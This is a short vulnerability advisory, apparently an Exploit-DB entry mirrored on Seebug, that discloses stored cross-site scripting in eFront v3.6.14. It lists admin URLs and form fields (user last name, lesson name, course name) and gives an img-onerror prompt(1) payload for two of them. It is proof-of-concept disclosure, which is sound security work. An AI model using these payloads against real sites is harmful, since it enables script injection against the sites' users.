########################################################### Exploit-DB Note: Screenshot provided by exploit author. ########################################################### [~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple Parameters [~] Author: sajith [~] version: eFront v3.6.14- build 18012 [~]Vendor Homepage: http://www.efrontlearning.net/ [~] vulnerable app link:http://www.efrontlearning.net/download ########################################################### POC by sajith shetty: [###]Log in with admin account and create new user http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1 (Home ? Users ? Administrator S. (root) ? New user) Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x onerror=prompt(1);> ] [###]create new lesson option ( http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss [payload:"><img src=x onerror=prompt(1);> ] [###]create new courses option( http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=courses&add_course=1) where "Course name:" filed is vulnerable to stored XSS
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论